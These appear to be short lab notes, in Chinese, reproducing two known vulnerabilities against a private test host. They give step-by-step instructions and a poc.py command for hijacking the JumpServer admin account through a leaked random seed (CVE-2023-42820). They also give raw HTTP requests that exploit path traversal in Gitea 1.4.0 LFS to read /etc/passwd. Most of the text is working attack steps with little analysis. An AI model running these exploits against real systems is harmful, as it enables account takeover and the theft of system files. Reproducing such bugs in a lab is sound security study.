(CVE-2023-42820)(Gitea 1.4目录穿越)

Jumpserver随机数种子泄露导致账户劫持漏洞（CVE-2023-42820）

首先，在浏览器第一个Tab中打开忘记密码页面：http://192.168.85.130:8080/core/auth/password/forget/previewing/

如果验证码中包含数字10，则请刷新验证码，因为我们使用的脚本暂时无法处理数字10；如果验证码中不包含数字10，则右键菜单中将该验证码在新Tab下打开。

新Tab中验证码的URL类似192.168.85.130:8080/core/auth/captcha/image/fcaed208176b5adb61c92ff590a069dcca847ab5/，其中包含该验证码的key（一串sha1 hash值），也就是后面伪随机数使用的种子，记录下这个值作为seed。

返回第一个Tab刷新页面。刷新页面的目的是，不使用包含“种子”的验证码，因为这个种子将在后续步骤中使用到。

此时这个页面的URL类似192.168.85.130:8080/core/auth/password/forgot/?token=5iJQm5smkbgrVC50bthCde0xABZZnReZzr31 其中包含一个随机的token值，记录下这个值作为token。

管理员邮箱账号默认为admin@mycomany.com

python3 poc.py -t http://192.168.85.130:8080/ –email admin@mycomany.com –seed fcaed208176b5adb61c92ff590a069dcca847ab5 –token 5iJQm5smkbgrVC50bthCde0xABZZnReZzr31

Gitea 1.4.0 目录穿越导致命令执行漏洞

POST /root/vulhub1.git/info/lfs/objects
Cache-Control: max-age=0
Accept: application/vnd.git-lfs+json
Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=t2uq6mDX0lN23WhuLSumCHsA7Dc6MTcwMjMwMTExOTMxOTQyNzA2NQ%3D%3D

{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}

GET /root/vulhub1.git/info/lfs/objects/……%2F..%2F..%2Fetc%2Fpasswd/sth